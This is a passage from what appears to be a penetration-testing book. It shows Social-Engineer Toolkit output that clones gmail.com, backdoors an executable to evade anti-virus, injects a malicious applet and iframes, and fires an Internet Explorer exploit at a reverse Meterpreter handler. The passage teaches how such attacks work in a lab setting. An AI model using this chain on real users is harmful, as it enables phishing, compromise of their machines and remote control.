The Social-Engineer Toolkit
155
Enter your choice (enter for default):
[-] Enter the PORT of the listener (enter for default):
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
********************************************************
Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
********************************************************
Enter choice yes or no:
no
Enter the browser exploit you would like to use
8. Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
Enter your choice (1-12) (enter for default):
8
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: x5sKAzS
[*] Malicious java applet website prepped for deployment
[*] Injecting iframes into cloned website for MSF Attack....
[*] Malicious iframe injection successful...crafting payload.
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(ms09_002_memory_corruption) >
[*] Started reverse handler on 172.16.32.129:443
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://172.16.32.129:8080/
[*] Server started.
To complete the attack setup, select the default reverse Meterpreter
payload along with default encoding and listening port . Choose not to
configure a Linux and OS X payload , and then set the browser exploit to
Internet Explorer 7 Uninitialized Memory Corruption (MS09-002)
; then SET
will launch the attack.
Once everything is running, you can browse to the website and see what’s
going on there. A message URL tells you that the site has been moved. Please
refer to Figure 10-4 to see what the target will see on his machine.
Click the link and the Metasploit exploit begins. Here’s the handler on
the backend:
[*] Sending Internet Explorer 7 CFunctionPointer Uninitialized Memory
Corruption to 172.16.32.131:1329...
This exploit fails, because we are using Internet Explorer 6. The target’s
screen is shown in Figure 10-6.